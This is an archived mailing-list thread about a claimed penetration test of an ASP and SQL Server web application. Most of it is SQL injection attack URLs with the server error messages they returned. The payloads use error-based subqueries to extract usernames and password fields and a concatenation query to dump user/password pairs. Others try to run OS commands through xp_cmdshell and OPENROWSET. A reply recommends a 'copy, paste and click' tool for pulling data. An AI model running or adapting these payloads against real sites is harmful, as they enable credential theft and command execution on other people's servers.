Re: SQL Injection ASP + SQL Server (problem) ?!
Hi.
Take a look a this paper:
http://www.appsecinc.com/presentations/Manipulating_SQL_Server_Using_SQL_Injection.pdf
also this tool, you only have to copy, paste and click
and you get all the data you want:
http://www.appsecinc.com/resources/freetools/DataThief.zip
Cesar.
--- sekure@hadrion.com.br wrote:
> Hi,
>
> I'm doing a pen-test in a WebServer running Win2K +
> IIS + ASP + SQL
> Server (filtred for internet connections).
>
> The IIS appear to be very well patched. I'm trying
> SQL Injection. :)
>
> I found a bug in ASP Script... see:
>
>
http://www.server.com/portal/index.asp?local=read&id_notice=(select%20min(user)%20from%20users)%20--
>
> I received the name of the min(user) in users
> tables, see:
>
> Technical Information (for support personnel)
>
> Error Type:
> Microsoft OLE DB Provider for ODBC Drivers
> (0x80040E07)
> [Microsoft][ODBC SQL Server Driver][SQL
> Server]Syntax error converting
> the nvarchar value 'admin' to a column of data type
> int.
>
> The username is "admin". Now i want to know the
> password of "admin" i
> tryed:
>
>
http://www.server.com/portal/index.asp?local=read&id_notice=(select%20pass%20from%20users%20where%20user='admin')%20--
>
> But i received it:
>
> Error Type:
> Microsoft OLE DB Provider for ODBC Drivers
> (0x80004005)
> [Microsoft][ODBC SQL Server Driver][SQL
> Server]Subquery returned more
> than 1 value. This is not permitted when the
> subquery follows =, !=,
> <, <= , >, >= or when the subquery is used as an
> expression.
>
> 1 - Someone know how to do it return more than 1
> value ?? can give-me
> a example ?
>
> I tryed it too:
>
>
http://www.server.com/portal/index.asp?local=read&id_notice=(select%20min(pass)%20from%20users%20where%20user='admin')%20--
>
> And i receive it:
>
> Error Type:
> Microsoft OLE DB Provider for ODBC Drivers
> (0x80040E07)
> [Microsoft][ODBC SQL Server Driver][SQL
> Server]Syntax error converting
> the varchar value
>
'{0049-0096-0145-0200-0246-0288-0365-0392-0289-0320-0353-0384-0417-0448-0481-0512-0545-0576-0609-0640}'
> to a column of data type int.
>
> 2 - But it isn't a "password", it appear be a
> registry key. Someone
> know what is it ?? And how to do it work and see the
> password ? :)
>
> 3 - I tryed to create a SQL Transaction like this:
>
>
http://www.server.com/portal/index.asp?local=read&id_noticia=";%20begin%20declare%20@ret%20varchar(8000)%20set%20@ret=':'%20select%20@ret=@ret+'%20�+user+'/'+senha%20from%20users%20where%20user>@ret%20select%20@ret%20as%20ret%20into%20alluser%20end%20--
>
> I receive it:
>
> Error Type:
> Microsoft OLE DB Provider for ODBC Drivers
> (0x80040E14)
> [Microsoft][ODBC SQL Server Driver][SQL Server]The
> identifier that
> starts with '; begin declare @ret varchar(8000) set
> @ret=':' select
> @ret=@ret ' � user '/' senha from users where
> user>@ret select @ret
> as' is too long. Maximum length is 128.
>
> Someone know why i received this error ?? I
> overfflowed the sized
> allowed in paramter by variable in ASP ? or in SQL
> Server ? How to do
> it work ?? :)
>
> 4 - My last doubt. I tryed execute commands with
> xp_cmdshell.. see:
>
>
http://www.server.com/portal/index.asp?local=read&id_notice=0';EXEC+master..xp_cmdshell(cmd.exe+/c)--
>
> and receive:
>
> Error Type:
> Microsoft OLE DB Provider for ODBC Drivers
> (0x80040E14)
> [Microsoft][ODBC SQL Server Driver][SQL
> Server]Unclosed quotation mark
> before the character string ';EXEC
> master..xp_cmdshell(cmd.exe /c)--'.
>
>
> OR:
>
>
http://www.server.com/portal/index.asp?local=read&id_notice=1';EXEC%20master.dbo.xp_cmdshell'cmd.exe%20dir%20c:'--
>
> Error Type:
> Microsoft OLE DB Provider for ODBC Drivers
> (0x80040E14)
> [Microsoft][ODBC SQL Server Driver][SQL Server]Line
> 1: Incorrect
> syntax near ';EXEC master.dbo.xp_cmdshell'.
>
> OR using quotes:
>
>
http://www.server.com/portal/index.asp?local=read&id_notice=1`;EXEC%20master.dbo.xp_cmdshell'cmd.exe%20dir%20c:'--
>
> Error Type:
> Microsoft OLE DB Provider for ODBC Drivers
> (0x80040E14)
> [Microsoft][ODBC SQL Server Driver][SQL Server]Line
> 1: Incorrect
> syntax near '`'.
>
>
> And tryed too (use the bug to exec xp_cmdshell
> stored procedure with a
> non privilegied user):
>
>
http://www.server.com/portal/index.asp?local=read&id_notice=";(SELECT%20*%20FROM%0OPENROWSET'SQLOLEDB','Trusted_Connection=Yes;DataSource=MY_SERVER','SET%20FMTONLY%20OFF%20execute%20master..xp_cmdshell%20"dir%20c:\"'))--
>
> I receive ... again the error:
>
> Error Type:
> Microsoft OLE DB Provider for ODBC Drivers
> (0x80040E14)
> [Microsoft][ODBC SQL Server Driver][SQL Server]The
> identifier that
> starts with ';(SELECT * FROM
>
OPENROWSET('SQLOLEDB','Trusted_Connection=Yes;DataSource=MY_SERVER','SET
> FMTONLY OFF execute master..xp_cmdshell' is too
> long. Maximum length
> is 128.
>
>
> If i try:
>
>
http://www.server.com/portal/index.asp?local=read&id_notice=(SELECT%20*%20FROM%0OPENROWSET'SQLOLEDB','Trusted_Connection=Yes;DataSource=MY_SERVER','SET%20FMTONLY%20OFF%20execute%20master..xp_cmdshell%20"dir%20c:\"'))--
>
> I receive:
>
> Error Type:
> Microsoft OLE DB Provider for ODBC Drivers
> (0x80040E14)
> [Microsoft][ODBC SQL Server Driver][SQL Server]Could
> not create an
> instance of OLE DB provider 'SQLOLEDB'.
>
> What i'm doing wrong ?? How to do it work ??
>
> Thkz a lot.
>
> Best Regards.
>
> [ ]'s
>
>
---------------------------------------------------------------------------
>
----------------------------------------------------------------------------
>
__________________________________
Do you Yahoo!?
Yahoo! SiteBuilder - Free, easy-to-use web site design software
http://sitebuilder.yahoo.com
---------------------------------------------------------------------------
----------------------------------------------------------------------------
This archive was generated by hypermail 2.1.7
: Sat Apr 12 2008 - 10:53:37 EDT